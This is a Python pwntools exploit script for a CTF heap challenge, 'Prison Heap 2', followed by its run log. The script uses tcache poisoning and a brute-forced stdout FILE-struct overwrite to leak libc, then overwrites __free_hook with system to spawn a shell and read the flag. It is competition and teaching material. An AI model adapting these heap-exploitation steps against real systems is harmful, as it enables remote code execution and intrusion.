Prison Heap 2 - C0r0n4CON Fwhibbit CTF
#!/usr/bin/env python3 | |
# coding: utf-8 | |
from pwn import * | |
# pwntools setup: spawn debugger panes in a horizontal tmux split.
context.terminal = ["tmux", "sp", "-h"]
# context.log_level = "DEBUG"  # enable for byte-level tube tracing

# Challenge endpoint (CTF infrastructure; the run log at the bottom of the
# file records the connections made against it).
HOST = "104.248.128.57"
PORT = 13337
# True runs the binary locally through process(); False connects to HOST:PORT.
LOCAL = False

# Challenge binary plus the libc used for symbol lookups.
# NOTE(review): the libc is the local system's copy; symbol offsets only hold
# if it matches the build deployed on the target — confirm that before
# relying on any address derived from it.
elf = ELF("./prison_heap_hard")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec=False)
def write_prison(size, data, corrupted=False):
    """Drive menu option 1: request a chunk of `size` bytes and send `data` into it.

    Args:
        size: value sent in reply to the size prompt (sent as its decimal string).
        data: payload sent after the "enter the prison" prompt; str or bytes.
        corrupted: when True the prompt is matched without its trailing newline
            and a short pause is inserted before sending. The caller switches
            this on for the allocations made after the leak stage — presumably
            because the program's output is no longer cleanly terminated by
            then; confirm against the binary.

    Talks over the module-level `io` tube, so it must be called only after
    `io` has been opened.
    """
    io.sendlineafter("3. Exit", "1")
    io.sendlineafter("heap", str(size))
    if corrupted:
        io.recvuntil("enter the prison")
        sleep(0.5)
    else:
        io.recvuntil("enter the prison\n")
    io.sendline(data)
def free_prison(idx):
    """Drive menu option 2: ask the program to free the chunk at index `idx`.

    No bookkeeping is done on this side; the index is passed straight through
    (as a decimal string) and whatever the program does with it is up to the
    program. Uses the module-level `io` tube.
    """
    io.sendlineafter("3. Exit", "2")
    io.sendlineafter("free", str(idx))
# Stage 1: open a connection, perform the allocation/free sequence, and read
# back a libc pointer. Every attempt uses a fresh connection: on a miss the
# tube is closed and the whole sequence repeats. The run log at the bottom of
# the file shows this as a burst of connect/close pairs before the HIT.
while True:
    io = process(elf.path) if LOCAL else remote(HOST, PORT)

    # The trailing numbers are the indices later handed to free_prison.
    write_prison(0x10, "")  # 0
    write_prison(0x100, "")  # 1
    write_prison(0x100, "/bin/sh\x00")  # 2 (Barrier)
    for _ in range(8):
        free_prison(1)
    free_prison(0)
    free_prison(0)
    write_prison(0x10, p8(0x80))  # 3 (Overwrite fd pointer)
    write_prison(0x10, "")  # 4
    write_prison(0x10, p16(0x8760))  # 5 (Good luck)
    write_prison(0x100, "")  # 6

    # The step the author marks "Good luck" is presumably address-dependent
    # (the retry loop and the log's many FAIL lines point that way). A hit is
    # recognised by eight zero bytes coming back; anything else, or the
    # connection dropping (EOFError), counts as a miss.
    try:
        write_prison(0x100, p64(0xfbad1800) + p64(0x0) * 3 + b"\x00")
        hit = io.recv(0x8) == b"\x00" * 8
        if hit:
            log.success("HIT! Stdout struct overwritten.")
            leak = u64(io.recv(8))
            log.success("Leaked GLIBC address: " + hex(leak))
    except EOFError:
        hit = False
    if not hit:
        log.failure("FAIL! Retrying...")
        io.close()
        continue
    break

# Stage 2: rebase libc from the leaked pointer and hand the session over.
# 0x3ed8b0 is the assumed distance between the leaked pointer and the base of
# the libc loaded above; it is only valid for that specific build.
libc.address = leak - 0x3ed8b0
log.info("GLIBC base address: " + hex(libc.address))
log.info("System@@GLIBC address: " + hex(libc.sym["system"]))

# From here on the helpers run in "corrupted" mode (see write_prison).
write_prison(0x30, "", True)
free_prison(8)
free_prison(8)
write_prison(0x30, p64(libc.sym["__free_hook"]), True)
write_prison(0x30, "", True)
write_prison(0x30, p64(libc.sym["system"]), True)
free_prison(2)  # index 2 is the chunk written with "/bin/sh" above

io.interactive()
io.close()
''' | |
[*] '/home/kaorz/Desktop/CTFs/coronafw/heap2/prison_heap_hard' | |
Arch: amd64-64-little | |
RELRO: Full RELRO | |
Stack: Canary found | |
NX: NX enabled | |
PIE: PIE enabled | |
[+] Opening connection to 104.248.128.57 on port 13337: Done | |
[-] FAIL! Retrying... | |
[*] Closed connection to 104.248.128.57 port 13337 | |
[+] Opening connection to 104.248.128.57 on port 13337: Done | |
[-] FAIL! Retrying... | |
[*] Closed connection to 104.248.128.57 port 13337 | |
[+] Opening connection to 104.248.128.57 on port 13337: Done | |
[-] FAIL! Retrying... | |
[*] Closed connection to 104.248.128.57 port 13337 | |
[+] Opening connection to 104.248.128.57 on port 13337: Done | |
[-] FAIL! Retrying... | |
[*] Closed connection to 104.248.128.57 port 13337 | |
[+] Opening connection to 104.248.128.57 on port 13337: Done | |
[-] FAIL! Retrying... | |
[*] Closed connection to 104.248.128.57 port 13337 | |
[+] Opening connection to 104.248.128.57 on port 13337: Done | |
[-] FAIL! Retrying... | |
[*] Closed connection to 104.248.128.57 port 13337 | |
[+] Opening connection to 104.248.128.57 on port 13337: Done | |
[-] FAIL! Retrying... | |
[*] Closed connection to 104.248.128.57 port 13337 | |
[+] Opening connection to 104.248.128.57 on port 13337: Done | |
[-] FAIL! Retrying... | |
[*] Closed connection to 104.248.128.57 port 13337 | |
[+] Opening connection to 104.248.128.57 on port 13337: Done | |
[-] FAIL! Retrying... | |
[*] Closed connection to 104.248.128.57 port 13337 | |
[+] Opening connection to 104.248.128.57 on port 13337: Done | |
[-] FAIL! Retrying... | |
[*] Closed connection to 104.248.128.57 port 13337 | |
[+] Opening connection to 104.248.128.57 on port 13337: Done | |
[+] HIT! Stdout struct overwritten. | |
[+] Leaked GLIBC address: 0x7f58d6c498b0 | |
[*] GLIBC base address: 0x7f58d685c000 | |
[*] System@@GLIBC address: 0x7f58d68ab440 | |
[*] Switching to interactive mode | |
$ cat /home/prison/prison_heap_hard/flag.txt | |
flag{h34p_Pr1s0n_1s_n3C3ss4rY_To_h4ck_Th3_Pl4n3t} | |
''' | |